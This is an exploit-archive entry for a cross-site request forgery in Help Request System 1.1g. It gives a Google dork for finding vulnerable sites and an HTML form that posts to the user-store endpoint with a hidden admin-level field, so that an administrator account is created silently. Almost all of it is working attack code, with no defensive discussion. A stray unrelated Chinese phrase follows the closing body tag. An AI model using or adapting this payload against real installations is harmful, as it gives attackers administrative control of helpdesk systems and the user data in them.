# Exploit Title: Help Request System 1.1g XSRF (add admin) # Date: 08-23-2011 # Google Dork: "powered by freehelpdesk.org" # Author: G13 # Software link: http://freehelpdesk.org/ # Version: 1.1g <html> <body> <form id="edit" method="post" action="http://localhost/request/index.php?sub=users&action=store&type=add" enctype=""> Name: <input class="FormItemTextbox" type="text" name="user_name" size="35" maxlength="" value=""><br> Login name:<input class="FormItemTextbox" type="text" name="user_login" size="20" maxlength="" value=""><br> Pass:<input class="FormItemTextbox" type="password" id="user_password" name="user_password" size="20" value=""><br> Pass confirm:<input class="FormItemTextbox" type="password" id="user_password_confirm" name="user_password_confirm" size="20" value=""><br> <input type="hidden" name="user_level" value="0"> <input class="btn" type="submit" value="Submit" id="submit" name="submit"> </form> </body>
体验盒子
